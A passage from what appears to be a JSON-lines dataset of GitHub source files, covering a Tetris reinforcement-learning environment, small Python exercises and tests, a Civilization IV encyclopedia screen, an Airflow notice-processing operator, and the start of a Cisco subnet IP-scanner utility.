tetris_shapes[self.next_stone_idx]\n self.col_heights = tf.zeros(cols, dtype=np.int32)\n self.curr_piece_rotation_cnt = 0\n \n if ai:\n if not rewards: \n raise ValueError(\"Required parameter: rewards\")\n self.invalidMoveReward, self.gameOverReward, self.validMoveReward, self.lineHeightPenalty, self.rotationPenalty = rewards\n self.initRL()\n else:\n self.initPygame()\n self.initHuman()\n \n def initPygame(self):\n import pygame\n pygame.init()\n pygame.key.set_repeat(250,25)\n self.width = cell_size*(cols+6)\n self.height = cell_size*rows\n self.rlim = cell_size*cols\n self.bground_grid = np.indices((rows, cols)).sum(axis=0) % 2\n self.bground_grid *= 8\n \n self.default_font = pygame.font.Font(\n pygame.font.get_default_font(), 12)\n \n self.screen = pygame.display.set_mode((self.width, self.height))\n pygame.event.set_blocked(pygame.MOUSEMOTION) # We do not need\n # mouse movement\n # events, so we\n # block them.\n \n @tf.function\n def new_board(self):\n board = tf.zeros((rows, cols), dtype=tf.int32)\n board = tf.concat((board, tf.ones((1,cols), dtype=tf.int32)), axis=0)\n return board\n\n def new_stone(self):\n self.stone = tf.identity(self.next_stone)\n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = tetris_shapes[self.next_stone_idx]\n self.stone_x = int(cols / 2 - len(self.stone[0])/2)\n self.stone_y = 0\n \n if check_collision(self.board,\n self.stone,\n (self.stone_y, self.stone_x)):\n self.gameover = True\n \n def initHuman(self):\n self.board = self.new_board()\n self.new_stone()\n self.level = 1\n self.score = 0\n self.lines = 0\n self.line_height = 0\n pygame.time.set_timer(pygame.USEREVENT+1, 1000)\n \n def initRL(self):\n '''X: [board, next, curr, pos] | A: [LEFT, RIGHT, DOWN, UP, SPACE] | S: [score]'''\n \n self.next_stone_idx = rand(len(tetris_shapes))\n self.next_stone = tetris_shapes[self.next_stone_idx]\n \n self.board = self.new_board()\n self.new_stone()\n self.level = 1\n self.score = 0\n self.lines = 0\n self.line_height = 0\n self.gameover = False\n self.paused = False\n \n def disp_msg(self, msg, topleft):\n x,y = topleft\n for line in msg.splitlines():\n self.screen.blit(\n self.default_font.render(\n line,\n False,\n (255,255,255),\n (0,0,0)),\n (x,y))\n y+=14\n \n def center_msg(self, msg):\n for i, line in enumerate(msg.splitlines()):\n msg_image = self.default_font.render(line, False,\n (255,255,255), (0,0,0))\n \n msgim_center_x, msgim_center_y = msg_image.get_size()\n msgim_center_x //= 2\n msgim_center_y //= 2\n \n self.screen.blit(msg_image, (\n self.width // 2-msgim_center_x,\n self.height // 2-msgim_center_y+i*22))\n \n def draw_matrix(self, matrix, offset):\n off_x, off_y = offset\n for iy, ix in np.ndindex(matrix.shape):\n val = matrix[iy, ix]\n if val:\n pygame.draw.rect(\n self.screen,\n colors[val],\n pygame.Rect(\n (off_x+ix) * cell_size,\n (off_y+iy) * cell_size, \n cell_size,\n cell_size),0)\n \n def add_cl_lines(self, n): #Returns score gained\n linescores = [0, 40, 100, 300, 1200]\n self.lines += n\n self.score += linescores[n] * self.level\n if self.lines >= self.level*6:\n self.level += 1\n if not self.ai:\n newdelay = 1000-50*(self.level-1)\n newdelay = 100 if newdelay < 100 else newdelay\n pygame.time.set_timer(pygame.USEREVENT+1, newdelay)\n return linescores[n] * self.level\n \n def move(self, delta_x):\n if not self.gameover and not self.paused:\n new_x = self.stone_x + delta_x\n if new_x < 0:\n return (False, 0)\n new_x = 0\n if new_x > cols - len(self.stone[0]):\n return (False, 0)\n new_x = cols - len(self.stone[0])\n collided = check_collision(\n self.board,\n self.stone,\n (self.stone_y, new_x))\n if not collided:\n self.stone_x = new_x\n return (True, 0)\n return (False, 0)\n\n def quit(self):\n self.center_msg(\"Exiting...\")\n pygame.display.update()\n sys.exit()\n\n #Clears all full rows and returns the score gained\n def clear_rows(self):\n cleared_rows = 0\n row_clear_mask = tf.Variable(tf.ones(21,), trainable=False)\n for i in range(self.board.shape[0]-1):\n row = self.board[i]\n if tf.math.count_nonzero(row) == row.shape[0]:\n row_clear_mask[i].assign(0)\n cleared_rows += 1\n self.line_height -= 1\n self.board = remove_rows(self.board, row_clear_mask)\n return self.add_cl_lines(cleared_rows)\n\n def drop(self, manual):\n scoreChange = 0\n if not self.gameover and not self.paused:\n scoreChange = 1 if manual else 0\n self.score += 1 if manual else 0\n prev_y = self.stone_y\n self.stone_y += 1\n if check_collision(self.board,\n self.stone,\n (self.stone_y, self.stone_x)):\n self.board = join_matrices(\n self.board,\n self.stone,\n (prev_y, self.stone_x))\n self.curr_piece_rotation_cnt = 0\n self.line_height = max(self.line_height, rows - (prev_y))\n scoreChange += self.clear_rows()\n self.new_stone()\n return (True, scoreChange)\n return (False, scoreChange)\n \n #pos = (y, x)\n # Returns the distance from the bottom of the piece to the rest of the stack\n def distance_to_stack(self, piece, pos):\n minDist = rows\n for i, j in np.ndindex(*piece.shape):\n if piece[i, j] != 0:\n glob_i, glob_j = i + pos[0], j + pos[1]\n minDist = min(minDist, rows - self.col_heights[glob_j] - glob_i)\n return minDist \n\n def insta_drop(self):\n scoreChange = 0\n if not self.gameover and not self.paused:\n dropped = self.drop(True)\n while(not dropped[0]):\n scoreChange += dropped[1]\n dropped = self.drop(True)\n scoreChange += dropped[1]\n return (True, scoreChange)\n\n def rotate_stone(self, direction = 1):\n if not self.gameover and not self.paused:\n new_stone = rotate_tensor(self.stone, direction)\n if not check_collision(self.board,\n new_stone,\n (self.stone_y, self.stone_x)):\n self.stone = new_stone\n self.curr_piece_rotation_cnt += 1\n\n #Penalize poor finesse by moving block down by 1 row\n if self.curr_piece_rotation_cnt >= 3:\n bonus = self.drop(False)[1]\n #But be sure to give a reward for any cleared lines etc.\n return (True, bonus)\n return (True, 0)\n return (False, 0)\n \n def toggle_pause(self):\n self.paused = not self.paused\n \n def start_game(self):\n if self.gameover:\n if self.ai:\n self.initRL()\n else:\n self.initHuman()\n self.gameover = False\n \n def run(self):\n key_actions = {\n 'ESCAPE': self.quit,\n 'LEFT': lambda:self.move(-1),\n 'RIGHT': lambda:self.move(+1),\n 'DOWN': lambda:self.drop(True),\n 'UP': self.rotate_stone,\n 'p': self.toggle_pause,\n 'SPACE': self.start_game,\n 'RETURN': self.insta_drop\n }\n \n self.gameover = False\n self.paused = False\n \n dont_burn_my_cpu = pygame.time.Clock()\n while 1:\n self.screen.fill((0,0,0))\n if self.gameover:\n self.center_msg(\"\"\"Game Over! Press space to continue\"\"\")\n else:\n if self.paused:\n self.center_msg(\"Paused\")\n else:\n pygame.draw.line(self.screen,\n (255,255,255),\n (self.rlim+1, 0),\n (self.rlim+1, self.height-1))\n self.disp_msg(\"Next:\", (\n self.rlim+cell_size,\n 2))\n self.disp_msg(\"Score: %d\\n\\nLevel: %d\\\n\\nLines: %d\" % (self.score, self.level, self.lines),\n (self.rlim+cell_size, cell_size*5))\n self.draw_matrix(self.bground_grid, (0,0))\n self.draw_matrix(self.board, (0,0))\n self.draw_matrix(self.stone,\n (self.stone_x, self.stone_y))\n self.draw_matrix(self.next_stone,\n (cols+1,2))\n pygame.display.update()\n \n for event in pygame.event.get():\n if event.type == pygame.USEREVENT+1:\n self.drop(False)\n elif event.type == pygame.QUIT:\n self.quit()\n elif event.type == pygame.KEYDOWN:\n for key in key_actions:\n if event.key == eval(\"pygame.K_\"\n +key):\n key_actions[key]()\n \n dont_burn_my_cpu.tick(maxfps)\n\n def getState(self):\n board = join_matrices(self.board, self.stone, (self.stone_y, self.stone_x))\n next_piece = padToShape(self.next_stone, (4,4)) #2x2, 2x3, 1x4\n current_piece = padToShape(self.stone, (4,4)) #2x2, 2x3, 1x4 padded to 4x4\n position = tf.constant((self.stone_x, self.stone_y), dtype=tf.int32, shape=(1, 2)) #1x2 #2x1\n line_height = tf.constant(self.line_height, dtype=tf.int32, shape=(1, 1))\n\n return([board, next_piece, current_piece, position, line_height])\n \n def getReward(self, actionStr, result, delta_line_height):\n reward = 0 \n\n if actionStr in COLLISION_MOVES:\n reward += self.validMoveReward if result[0] else self.invalidMoveReward\n \n reward += result[1]\n\n reward -= self.lineHeightPenalty * delta_line_height\n reward -= self.rotationPenalty * max(0, (self.curr_piece_rotation_cnt - 3))\n return reward\n \n def doAction(self, action):\n ACTIONS = {0: 'LEFT', 1:'RIGHT', 2:'DOWN', 3:'ROTATE_LEFT', 4:'ROTATE_RIGHT', 5:'HARD_DROP'}\n actionStr = ACTIONS[action]\n ACTION_FN = {\n 'LEFT': lambda: self.move(-1),\n 'RIGHT': lambda: self.move(+1),\n 'DOWN': lambda: self.drop(True),\n 'ROTATE_LEFT': self.rotate_stone,\n 'ROTATE_RIGHT': lambda: self.rotate_stone(-1),\n 'HARD_DROP': self.insta_drop\n }\n \n prev_line_height = self.line_height\n #Perform action\n result = ACTION_FN[actionStr]()\n\n #Return reward for action\n if self.gameover:\n reward = self.gameOverReward\n else:\n reward = self.getReward(actionStr, result, self.line_height - prev_line_height)\n \n return (self.getState(), reward, self.gameover)","repo_name":"bbenip/tetris-ai","sub_path":"model/rl/tetris.py","file_name":"tetris.py","file_ext":"py","file_size_in_byte":15721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40308295633","text":"def Xpattern(i):\n for j in range(1,n):\n if i==j:\n print(j,end='')\n else:\n print(' ',end='')\n for j in range(n,0,-1):\n if i==j:\n print(j,end='')\n else:\n print(' ',end='')\n print()\nn=int(input())\nfor i in range(1,n+1):\n Xpattern(i)\nfor i in range(n-1,0,-1):\n Xpattern(i)\n'''\n5\n1 1\n 2 2 \n 3 3 \n 4 4 \n 5 \n 4 4 \n 3 3 \n 2 2 \n1 1\n'''\n","repo_name":"hemanthsoma/Coding-Practice","sub_path":"Xpattern.py","file_name":"Xpattern.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"70069332323","text":"import pytest\nfrom arrays.spiral_matrix import Solution\n\n\n@pytest.mark.parametrize(\"matrix,expected\", [\n ([[1, 2, 3], [4, 5, 6], [7, 8, 9]], [1, 2, 3, 6, 9, 8, 7, 4, 5]),\n ([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]], [1, 2, 3, 4, 8, 12, 11, 10, 9, 5, 6, 7])\n])\ndef test_spiral_matrix(matrix, expected):\n assert expected == Solution().spiralOrder(matrix)\n","repo_name":"sikakente/blind-75","sub_path":"tests/arrays/test_spiral_matrix.py","file_name":"test_spiral_matrix.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"4076758326","text":"from CvPythonExtensions import *\nimport CvUtil\nimport ScreenInput\nimport CvScreenEnums\n\n# globals\ngc = CyGlobalContext()\nArtFileMgr = CyArtFileMgr()\nlocalText = CyTranslator()\n\nclass CvPediaUnitChart:\n\t\"Civilopedia Screen for Unit Combat Groups\"\n\n\tdef __init__(self, main):\n\t\tself.iGroup = -1\n\t\tself.top = main\n\t\t\t\n\t\tself.X_UNITS = 50\n\t\tself.Y_UNITS = 95\n\t\tself.W_UNITS = 700\n\t\tself.H_UNITS = 570\n\t\tself.DX_UNITS = 150\n\t\tself.DY_UNITS = 40\n\t\tself.Y_TEXT_MARGIN = 6\n\n\t# Screen construction function\n\tdef interfaceScreen(self, iGroup):\t\n\t\t\t\n\t\tself.iGroup = iGroup\n\t\n\t\tself.top.deleteAllWidgets()\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\tscreen = self.top.getScreen()\n\t\t\n\t\tbNotActive = (not screen.isActive())\n\t\tif bNotActive:\n\t\t\tself.top.setPediaCommonWidgets()\n\n\t\t# Header...\n\t\tif (self.iGroup >= gc.getNumUnitCombatInfos()):\n\t\t\tszHeader = localText.getText(\"TXT_KEY_PEDIA_ALL_UNITS\", ())\n\t\telse:\n\t\t\tszHeader = gc.getUnitCombatInfo(self.iGroup).getDescription()\n\t\tszHeader = u\"\" + szHeader.upper() + u\"\"\n\t\tszHeaderId = self.top.getNextWidgetName()\n\t\tscreen.setLabel(szHeaderId, \"Background\", szHeader, CvUtil.FONT_CENTER_JUSTIFY, self.top.X_SCREEN, self.top.Y_TITLE, 0, FontTypes.TITLE_FONT, WidgetTypes.WIDGET_GENERAL, -1, -1)\n\t\t\n\t\t# Top\n\t\tscreen.setText(self.top.getNextWidgetName(), \"Background\", self.top.MENU_TEXT, CvUtil.FONT_LEFT_JUSTIFY, self.top.X_MENU, self.top.Y_MENU, 0, FontTypes.TITLE_FONT, WidgetTypes.WIDGET_PEDIA_MAIN, CivilopediaPageTypes.CIVILOPEDIA_PAGE_UNIT_GROUP, -1)\n\n\t\tif self.top.iLastScreen\t!= CvScreenEnums.PEDIA_UNIT_CHART or bNotActive:\t\t\n\t\t\tself.placeLinks(true)\n\t\t\tself.top.iLastScreen = CvScreenEnums.PEDIA_UNIT_CHART\n\t\telse:\n\t\t\tself.placeLinks(false)\n\t\t\t\t\n\t\tself.placeUnitTable()\n\t\t\t\t\t\t\n\tdef placeUnitTable(self):\n\t\tscreen = self.top.getScreen()\n\t\t\n\t\tpanelName = self.top.getNextWidgetName()\n\t\tscreen.addPanel( panelName, \"\", \"\", true, true,\n\t\t\tself.X_UNITS, self.Y_UNITS, self.W_UNITS, self.H_UNITS, PanelStyles.PANEL_STYLE_BLUE50 )\n\t\t\n\t\tiMargin = 40\n\t\tpanelName2 = self.top.getNextWidgetName()\n\t\tscreen.addPanel( panelName2, \"\", \"\", true, true,\n self.X_UNITS + iMargin, self.Y_UNITS + iMargin, self.W_UNITS - (iMargin * 2), self.H_UNITS - (iMargin * 2), PanelStyles.PANEL_STYLE_BLUE50 )\n\t\tszTable = self.top.getNextWidgetName()\n\t\tscreen.addTableControlGFC(szTable, 4,\n\t\t\tself.X_UNITS + iMargin, self.Y_UNITS + iMargin + 5, self.W_UNITS - (iMargin * 2), self.H_UNITS - (iMargin * 2) - 10, True, False, 32,32, TableStyles.TABLE_STYLE_EMPTY)\n\t\tscreen.enableSort(szTable)\n\t\t\t\n#\t\tscreen.attachTableControlGFC( panelName, szTable, 4, False, True, 32, 32, TableStyles.TABLE_STYLE_EMPTY );\n\t\t\t\n\t\tiTableWidth = self.W_UNITS - (iMargin * 2)\n\t\tiColWidth = int(iTableWidth * (7 / 19.0))\n\t\tscreen.setTableColumnHeader(szTable, 0, \"\", iColWidth)\n\t\tiColWidth = int(iTableWidth * (4 / 19.0))\n\t\tscreen.setTableColumnHeader(szTable, 1, u\"%c\" % CyGame().getSymbolID(FontSymbols.STRENGTH_CHAR), iColWidth)\n\t\tscreen.setTableColumnHeader(szTable, 2, u\"%c\" % CyGame().getSymbolID(FontSymbols.MOVES_CHAR), iColWidth)\n\t\tscreen.setTableColumnHeader(szTable, 3, u\"%c\" % gc.getYieldInfo(YieldTypes.YIELD_PRODUCTION).getChar(), iColWidth)\n\t\t\t\t\t\n\t\t# count units in this group\n\t\tnUnits = 0\n\t\tfor j in range(gc.getNumUnitInfos()):\n\t\t\tif (self.iGroup == gc.getUnitInfo(j).getUnitCombatType() or self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\t\tnUnits += 1\n\n\t\tdy = self.DY_UNITS\n\t\tyTextMargin = self.Y_TEXT_MARGIN\n\t\tif (self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\tdy = self.DY_UNITS/2\n\t\t\tyTextMargin = 0\n\n\t\t# sort Units by strength\n\t\ti = 0\n\t\tunitsList=[(0,0,0,0,0)]*nUnits\n\t\tfor j in range(gc.getNumUnitInfos()):\n\t\t\tif (self.iGroup == gc.getUnitInfo(j).getUnitCombatType() or self.iGroup == gc.getNumUnitCombatInfos()):\n\t\t\t\n\t\t\t\tif (gc.getUnitInfo(j).getDomainType() == DomainTypes.DOMAIN_AIR):\n\t\t\t\t\tiStrength = unicode(gc.getUnitInfo(j).getAirCombat())\n\t\t\t\t\tiMovement = unicode(gc.getUnitInfo(j).getAirRange())\n\t\t\t\telse:\n\t\t\t\t\tiStrength = unicode(gc.getUnitInfo(j).getCombat())\n\t\t\t\t\tiMovement = unicode(gc.getUnitInfo(j).getMoves())\n\t\t\t\t\t\n\t\t\t\tif (gc.getUnitInfo(j).getProductionCost() < 0):\n\t\t\t\t\tszCost = localText.getText(\"TXT_KEY_NON_APPLICABLE\", ())\n\t\t\t\telse:\n\t\t\t\t\tszCost = unicode(gc.getUnitInfo(j).getProductionCost())# + u\"%c\" % gc.getYieldInfo(YieldTypes.YIELD_PRODUCTION).getChar()\n\t\t\t\t\t\n\t\t\t\tunitsList[i] = (iStrength, iMovement, szCost, gc.getUnitInfo(j).getDescription(), j)\n\t\t\t\ti += 1\n\n\t\tfor i in range(nUnits):\t\t\t\n\t\t\tiRow = screen.appendTableRow(szTable)\n\t\t\tscreen.setTableText(szTable, 0, iRow, u\"\" + unitsList[i][3] + u\"\", \"\", WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT, unitsList[i][4], 1, CvUtil.FONT_LEFT_JUSTIFY)\t\t\t\t\t\t\n\t\t\tscreen.setTableInt(szTable, 1, iRow, u\"\" + unicode(unitsList[i][0]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)\n\t\t\tscreen.setTableInt(szTable, 2, iRow, u\"\" + unicode(unitsList[i][1]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)\n\t\t\tscreen.setTableInt(szTable, 3, iRow, u\"\" + unicode(unitsList[i][2]) + u\"\", \"\", WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)\n\n\tdef placeLinks(self, bRedraw):\n\n\t\tscreen = self.top.getScreen()\n\n\t\tif bRedraw:\n\t\t\tscreen.clearListBoxGFC(self.top.LIST_ID)\n\t\t\n\t\t# sort groups alphabetically\n\t\tlistSorted=[(0 ,0)] * gc.getNumUnitCombatInfos()\n\t\tfor j in range(gc.getNumUnitCombatInfos()):\n\t\t\tlistSorted[j] = (gc.getUnitCombatInfo(j).getDescription(), j)\n\t\tlistSorted.sort()\t\t\t\n\n\t\tiSelected = 0\n\t\tif bRedraw:\t\t\n\t\t\tscreen.appendListBoxString( self.top.LIST_ID, localText.getText(\"TXT_KEY_PEDIA_ALL_GROUPS\", ()), WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT_COMBAT, gc.getNumUnitCombatInfos(), 0, CvUtil.FONT_LEFT_JUSTIFY )\n\t\tif self.iGroup == gc.getNumUnitCombatInfos():\n\t\t\tiSelected = 0\n\n\t\ti = 1\n\t\tfor iI in range(gc.getNumUnitCombatInfos()):\n\t\t\tif (not gc.getUnitCombatInfo(listSorted[iI][1]).isGraphicalOnly()):\n\t\t\t\tif bRedraw:\n\t\t\t\t\tscreen.appendListBoxString( self.top.LIST_ID, listSorted[iI][0], WidgetTypes.WIDGET_PEDIA_JUMP_TO_UNIT_COMBAT, listSorted[iI][1], 0, CvUtil.FONT_LEFT_JUSTIFY )\n\t\t\t\tif listSorted[iI][1] == self.iGroup:\n\t\t\t\t\tiSelected = i\n\t\t\t\ti += 1\t\t\t\n\n\t\tscreen.setSelectedListBoxStringGFC(self.top.LIST_ID, iSelected)\n\t\t\n\t# Will handle the input for this screen...\n\tdef handleInput (self, inputClass):\n\t\treturn 0\n\n","repo_name":"max-zanko/civ4-beyond-the-sword-sdk","sub_path":"Assets/Python/Screens/CvPediaUnitChart.py","file_name":"CvPediaUnitChart.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"30436988309","text":"class Employee:\n def __init__(self, name, role, age, salary):\n self.name = name\n self.age = age\n self.role= role\n self.salary = salary\n\n @staticmethod\n def printStr():\n print('Employee') \n\n\nclass Entreprenuer:\n def __init__(self, name, age, networth, company):\n self.name = name\n self.age = age\n self.networth= networth\n self.company = company\n\n @staticmethod\n def printStr():\n print('Entreprenuer') \n\nclass Programmer(Employee, Entreprenuer):# here the order is important: the constructor for arrguments will be searched in the Employee class\n def __init__(self, name, role, age, salary, language):\n super().__init__(name, role, age, salary)\n self.language = language\n\nsam = Programmer('Sambhav Kaushik', 'brogrammer', 17, 99999999999, ['java','js','python','c++','dart']);\nprint(sam.language)\nsam.printStr()# first class will be choosen first, then second class\n","repo_name":"masterboy376/Python-tutorial","sub_path":"tut61_MultipleInheritance.py","file_name":"tut61_MultipleInheritance.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37820381817","text":"from concurrent.futures import ThreadPoolExecutor\nfrom typing import Any, Protocol, List, Optional\nfrom uuid import uuid4\nfrom airflow.models import BaseOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\nfrom pymongo import MongoClient\n\nfrom dags.dags_utils import pull_dag_upstream, push_dag_downstream, get_dag_param, smart_xcom_pull, \\\n smart_xcom_push\nfrom dags.pipelines.pipeline_protocols import NoticePipelineCallable\nfrom ted_sws import config\nfrom ted_sws.core.service.batch_processing import chunks\nfrom ted_sws.data_manager.adapters.notice_repository import NoticeRepository\nfrom ted_sws.event_manager.model.event_message import EventMessage, NoticeEventMessage\nfrom ted_sws.event_manager.services.log import log_notice_error\nfrom ted_sws.event_manager.services.logger_from_context import get_logger, handle_event_message_metadata_dag_context\n\nNOTICE_IDS_KEY = \"notice_ids\"\nSTART_WITH_STEP_NAME_KEY = \"start_with_step_name\"\nEXECUTE_ONLY_ONE_STEP_KEY = \"execute_only_one_step\"\nNOTICE_PROCESSING_PIPELINE_DAG_NAME = \"notice_processing_pipeline\"\nDEFAULT_START_WITH_TASK_ID = \"notice_normalisation_pipeline\"\nDEFAULT_PIPELINE_NAME_FOR_LOGS = \"unknown_pipeline_name\"\nAIRFLOW_NUMBER_OF_WORKERS = config.AIRFLOW_NUMBER_OF_WORKERS\nMAX_BATCH_SIZE = 2000\n\n\nclass BatchPipelineCallable(Protocol):\n\n def __call__(self, notice_ids: List[str], mongodb_client: MongoClient) -> List[str]:\n \"\"\"\n :param notice_ids:\n :param mongodb_client:\n :return: List of notice_ids what was processed.\n \"\"\"\n\n\nclass NoticeBatchPipelineOperator(BaseOperator):\n \"\"\"\n\n \"\"\"\n\n ui_color = '#e7cff6'\n ui_fgcolor = '#000000'\n\n def __init__(self, *args,\n notice_pipeline_callable: NoticePipelineCallable = None,\n batch_pipeline_callable: BatchPipelineCallable = None,\n **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.notice_pipeline_callable = notice_pipeline_callable\n self.batch_pipeline_callable = batch_pipeline_callable\n\n def single_notice_processor(self, notice_id: str, notice_repository: NoticeRepository,\n pipeline_name: str) -> Optional[str]:\n \"\"\"\n This method can execute the notice_pipeline_callable for a single notice_id.\n :param notice_id: The notice_id what will be processed.\n :param notice_repository: The notice repository.\n :param pipeline_name: The pipeline name for logs.\n \"\"\"\n logger = get_logger()\n notice = None\n processed_notice_id = None\n try:\n notice_event = NoticeEventMessage(notice_id=notice_id,\n domain_action=pipeline_name)\n notice_event.start_record()\n notice = notice_repository.get(reference=notice_id)\n result_notice_pipeline = self.notice_pipeline_callable(notice, notice_repository.mongodb_client)\n if result_notice_pipeline.store_result:\n notice_repository.update(notice=result_notice_pipeline.notice)\n notice_event.end_record()\n if result_notice_pipeline.processed:\n processed_notice_id = notice_id\n if notice.normalised_metadata:\n notice_event.notice_form_number = notice.normalised_metadata.form_number\n notice_event.notice_eforms_subtype = notice.normalised_metadata.eforms_subtype\n notice_event.notice_status = str(notice.status)\n logger.info(event_message=notice_event)\n error_message = result_notice_pipeline.error_message\n except Exception as exception_error_message:\n error_message = str(exception_error_message)\n if error_message:\n notice_normalised_metadata = notice.normalised_metadata if notice else None\n log_notice_error(message=error_message, notice_id=notice_id, domain_action=pipeline_name,\n notice_form_number=notice_normalised_metadata.form_number if notice_normalised_metadata else None,\n notice_status=notice.status if notice else None,\n notice_eforms_subtype=notice_normalised_metadata.eforms_subtype if notice_normalised_metadata else None)\n return processed_notice_id\n\n def multithread_notice_processor(self, notice_ids: list, mongodb_client: MongoClient, pipeline_name: str) -> list:\n \"\"\"\n This method can execute the notice_pipeline_callable for each notice_id in the notice_ids batch.\n :param notice_ids: The notice_ids batch.\n :param mongodb_client: The mongodb client.\n :param pipeline_name: The pipeline name for logs.\n \"\"\"\n processed_notice_ids = []\n notice_repository = NoticeRepository(mongodb_client=mongodb_client)\n with ThreadPoolExecutor() as executor:\n futures = [executor.submit(self.single_notice_processor, notice_id, notice_repository, pipeline_name)\n for notice_id in notice_ids]\n for future in futures:\n processed_notice_id = future.result()\n if processed_notice_id:\n processed_notice_ids.append(processed_notice_id)\n return processed_notice_ids\n\n def execute(self, context: Any):\n \"\"\"\n This method can execute the notice_pipeline_callable for each notice_id in the notice_ids batch or\n can execute the batch_pipeline_callable for whole notice_ids batch at once.\n \"\"\"\n logger = get_logger()\n notice_ids = smart_xcom_pull(key=NOTICE_IDS_KEY)\n if not notice_ids:\n raise Exception(f\"XCOM key [{NOTICE_IDS_KEY}] is not present in context!\")\n mongodb_client = MongoClient(config.MONGO_DB_AUTH_URL)\n processed_notice_ids = []\n pipeline_name = DEFAULT_PIPELINE_NAME_FOR_LOGS\n if self.notice_pipeline_callable:\n pipeline_name = self.notice_pipeline_callable.__name__\n elif self.batch_pipeline_callable:\n pipeline_name = self.batch_pipeline_callable.__name__\n number_of_notices = len(notice_ids)\n batch_event_message = EventMessage(\n message=f\"Batch processing for pipeline = [{pipeline_name}] with {number_of_notices} notices.\",\n kwargs={\"pipeline_name\": pipeline_name,\n \"number_of_notices\": number_of_notices}\n )\n handle_event_message_metadata_dag_context(batch_event_message, context)\n batch_event_message.start_record()\n if self.batch_pipeline_callable is not None:\n processed_notice_ids = self.batch_pipeline_callable(notice_ids=notice_ids, mongodb_client=mongodb_client)\n elif self.notice_pipeline_callable is not None:\n processed_notice_ids = self.multithread_notice_processor(notice_ids=notice_ids,\n mongodb_client=mongodb_client,\n pipeline_name=pipeline_name\n )\n batch_event_message.end_record()\n logger.info(event_message=batch_event_message)\n if not processed_notice_ids:\n raise Exception(\"No notice has been processed!\")\n smart_xcom_push(key=NOTICE_IDS_KEY, value=processed_notice_ids)\n\n\nclass TriggerNoticeBatchPipelineOperator(BaseOperator):\n ui_color = ' #1bd5ff'\n ui_fgcolor = '#000000'\n\n def __init__(\n self,\n *args,\n start_with_step_name: str = None,\n batch_size: int = None,\n execute_only_one_step: bool = None,\n push_result: bool = False,\n **kwargs) -> None:\n super().__init__(*args, **kwargs)\n self.start_with_step_name = start_with_step_name if start_with_step_name else DEFAULT_START_WITH_TASK_ID\n self.execute_only_one_step = execute_only_one_step\n self.push_result = push_result\n self.batch_size = batch_size\n\n def execute(self, context: Any):\n if self.execute_only_one_step is None:\n self.execute_only_one_step = get_dag_param(key=EXECUTE_ONLY_ONE_STEP_KEY, default_value=False)\n notice_ids = pull_dag_upstream(key=NOTICE_IDS_KEY)\n if notice_ids:\n if not self.batch_size:\n batch_size = 1 + len(notice_ids) // AIRFLOW_NUMBER_OF_WORKERS\n batch_size = batch_size if batch_size < MAX_BATCH_SIZE else MAX_BATCH_SIZE\n else:\n batch_size = self.batch_size\n for notice_batch in chunks(notice_ids, chunk_size=batch_size):\n TriggerDagRunOperator(\n task_id=f'trigger_worker_dag_{uuid4().hex}',\n trigger_dag_id=NOTICE_PROCESSING_PIPELINE_DAG_NAME,\n conf={\n NOTICE_IDS_KEY: list(notice_batch),\n START_WITH_STEP_NAME_KEY: self.start_with_step_name,\n EXECUTE_ONLY_ONE_STEP_KEY: self.execute_only_one_step\n }\n ).execute(context=context)\n\n if self.push_result:\n push_dag_downstream(key=NOTICE_IDS_KEY, value=notice_ids)\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"dags/operators/DagBatchPipelineOperator.py","file_name":"DagBatchPipelineOperator.py","file_ext":"py","file_size_in_byte":9311,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"4305429722","text":"from ipaddress import IPv4Network, AddressValueError\nfrom CiscoIPScanner.general import mt\nfrom CiscoIPScanner.exceptions import (\n InvalidVRF, NoVRFSpecifiedWithIntInVRF, InvalidIntfIPAddress, InvalidDeviceType, NoIntfIPSpecified,\n NoNXOSIntfIPSpecified, SubnetTooLarge, InvalidVlanID, InvalidNetworkID, InvalidInterfaceIP,\n InterfaceIPAddressNotInNetwork, VlanNotInVlanDB, TemplatesNotFoundWithinPackage)\nfrom CiscoIPScanner.address_validator import ipv4\nfrom progressbar import progressbar\n# import time\n\n# TODO: Add router support\n# TODO: Add check to make sure SVI\n\n\ndef hosts_lists_parse(prefix, all_hosts):\n \"\"\"Splits host list into seperate lists for concurrent SSH or TELNET sessions for faster IP scan\\n\n if prefix length is between 29 and 23\"\"\"\n if prefix == 29:\n return [\n all_hosts[0:2], all_hosts[2:4], all_hosts[4:6]\n ]\n elif prefix == 28:\n return [\n all_hosts[0:2], all_hosts[2:4], all_hosts[4:6], all_hosts[6:8],\n all_hosts[8:10], all_hosts[10:12], all_hosts[12:14]\n ]\n elif prefix == 27:\n return [\n all_hosts[0:5], all_hosts[5:10], all_hosts[10:15], all_hosts[15:20],\n all_hosts[20:25], all_hosts[25:30]\n ]\n elif prefix == 26:\n return [\n all_hosts[0:15], all_hosts[15:30], all_hosts[30:45], all_hosts[45:60],\n all_hosts[60:62]\n ]\n elif prefix == 25:\n return [\n all_hosts[0:18], all_hosts[18:36], all_hosts[36:54], all_hosts[54:72],\n all_hosts[72:90], 